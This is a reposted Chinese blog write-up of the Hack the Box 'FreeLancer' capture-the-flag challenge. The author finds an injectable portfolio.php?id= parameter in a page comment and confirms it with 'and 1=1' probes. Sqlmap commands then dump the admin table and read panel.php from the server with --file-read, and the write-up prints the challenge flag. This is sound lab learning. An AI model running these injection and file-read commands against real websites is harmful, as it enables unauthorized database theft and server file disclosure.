数据库
首页 > 数据库> > Hack the Box——FreeLancer(sql) wp

Hack the Box——FreeLancer(sql) wp

作者:互联网

0x00前言

忙着学习的我,继续肝下一题

提示:

Can you test how secure my website is? Prove me wrong and capture the flag!(您可以测试我的网站的安全性吗?证明我错了,并抓住了旗子!)

0x01访问网站

http://167.99.88.216:32583/

首先找攻击点

0x02 攻击点

打开源码从注释中找到攻击点

<!-- <a href="portfolio.php?id=1">Portfolio 1</a> -->

看见这个瞬间想到sql注入

首先常规判断注入

and 1=1
and 1=2

和上面对比显然出错,接下来使用神器sqlmap进行注入

python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" -v 3

python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" -v 3  -dbs

python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" -v 3 -D freelancer --tables

python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" -v 3 -T safeadmin -dump

看见这密码,以为成功了,试遍好多解码网站都解不开

使用dirsearch进行目录爆破找到路径

最后使用路径尝试读文件

python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" --file-read=/var/www/html/administrat/panel.php

最后打开文件找到flag

flag:HTB{s4ff_3_1_w33b_fr4__l33nc_3}

0x04 总结

尽可能多使用信息收集工具,不然目录都找不到

标签:Box,sqlmap,http,88.216,FreeLancer,sql,32583,php,167.99
来源: https://blog.csdn.net/yutao598/article/details/112993784